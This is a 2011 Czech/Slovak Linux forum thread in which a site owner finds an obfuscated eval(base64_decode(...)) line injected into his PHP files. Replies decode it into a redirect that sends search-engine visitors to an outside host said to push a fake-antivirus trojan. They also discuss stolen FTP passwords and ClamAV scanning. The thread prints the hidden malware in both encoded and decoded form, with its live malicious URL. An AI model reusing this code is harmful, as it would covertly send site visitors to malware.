Portál AbcLinuxu, 11. května 2025 06:49

Dotaz: Napadnuté weby

9.5.2011 12:26 dusan
Napadnuté weby
Přečteno: 535×
Odpovědět | Admin
Zdravím.

Na stránkach s príponov php, na mojom servery, mám na mnohých weboch tento kód: 
eval(base64_decode("DQoNCg0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcm
VyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwi
dHdpdHRlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZX
JlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZl
cmVyLCJsaXZlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2siKSkgew0KCWlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3
RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Jpbmdvc3RhcnQub3NhLnBsLyIpOw0KCQlleGl0
KCk7DQoJfQ0KfQ0KfQ=="));
Po prekódovaní z BASE64 to je: 
Binary data detected! Click 'DOWNLOAD BINARY FILE NOW' button to download file.

WARNING!!!!
===========
Be careful what you download. If the file contains a virus, you will infect your machine!!
HIT 'BACK' when done.
Predpokladám, že mám zavírené stránky. Neviete čo to je, a ako tomu predchádzať? Poprípade existuje nejaký antivír, ktorý to dokáže odvíriť? V napadnutých doménach sa to nachádza skoro v každom php súbore.
Nástroje: Začni sledovat (0) ?Zašle upozornění na váš email při vložení nového komentáře.

Odpovědi

9.5.2011 12:31 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby
Odpovědět | | Sbalit | Link | Blokovat | Admin
A ešte jedna vec, čo som si všimol: Zmenené súbory majú pôvodný dátum a čas.
9.5.2011 12:33 Stanislav Petr | skóre: 27 | Praha
Rozbalit Rozbalit vše Re: Napadnuté weby
Odpovědět | | Sbalit | Link | Blokovat | Admin
Obecne informace jak postupovat najdete napriklad v napovede tady: http://www.hosting90.cz/cz/napoveda-jak-postupovat-pri-napadeni-stranek-skodlivym-kodem

Jako dalsi praventivni krok, pokud se jedna o server ktery slouzi pro zakazniky doplnit FTP server o antivir. Dobry zkusenosti mam s proftpd + mod_clamav (http://www.thrallingpenguin.com/resources/mod_clamav.htm)

Obvykle k tomuhle dochazi pomoci nahrani prez FTP kdy utocnik hesla nejcasteji ziskava z ulozenych udaju prave v aplikaci Total Commander.
No jo... Co bych cekal od systemu, kterej se vypina tlacitkem start... http://glux.org
9.5.2011 12:48 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby
Dík za info.

Ešte by ma zaujímalo, či existuje nejaký antivir ktorý by som mohol púšťať v crone, a ktorí by preskenoval vsetky domeny.

Ten kód mi nedáva zmysel. Je to len čistý text, žiadna php funkcia. Potrebujem tie stránky opraviť. Bohužiaľ sa mi weby zálohujú každý deň posledných 7 dní, MySQL posledný mesiac. Vo vecsine su zavirene aj v zalohach. Nechcem to robiť rucne, lebo ich mozem pokazit.
Jakub Lucký avatar 9.5.2011 12:53 Jakub Lucký | skóre: 40 | Praha
Rozbalit Rozbalit vše Re: Napadnuté weby
Odpovědět | | Sbalit | Link | Blokovat | Admin
Po překódování z base64 mi vyšlo tohle: 

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"twitter") or stristr($referer,"yahoo") or stristr($referer,"google") or stristr($referer,"bing") or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live") or stristr($referer,"facebook")) {
	if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://ringostart.osa.pl/");
		exit();
	}
}
}
If you understand, things are just as they are; if you do not understand, things are just as they are.
9.5.2011 12:57 dusan
Rozbalit Rozbalit vše Re: Napadnuté weby
Kurva !!!

Nie som PHP programator, čo tým autor zamýšlal?
9.5.2011 13:29 Kit
Rozbalit Rozbalit vše Re: Napadnuté weby
Zkusil jsem si dát URL do browseru. Mít Windows, tak bych určitě moc klidný nebyl. Provede virtuální antivirový test a snaží se stáhnout "antivirák", tedy trojského koně.
9.5.2011 15:22 Der Teufel
Rozbalit Rozbalit vše Re: Napadnuté weby
Tenhle malware znám, odstraňoval jsem ho z několika počítačů. Hodně odolná svině. Stáhne "antimalware", který pak spouští při každém pokusu o načtení jakékoliv webové stránky, docela znepříjemní další brouzdání po netu (ukazuje furt svou webovou stránku s varováním že kvůli bezpečnosti zablokoval načítání). Samotní antimalware samozřejmě požaduje zaplacení plné verze pro odstranění "nalezených" malware a vypadá velice dobře, skvěle zapadá do systému.
9.5.2011 13:17 NN
Rozbalit Rozbalit vše Re: Napadnuté weby
V klidu je to jen presmerovani na nejakou sracku..

NN
9.5.2011 14:44 tomvec | skóre: 24 | Kojetín
Rozbalit Rozbalit vše Re: Napadnuté weby
Ale co chudáci Widlí, co to sežerou i navijákem?

Založit nové vláknoNahoru

Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

ISSN 1214-1267, (c) 1999-2007 Stickfish s.r.o.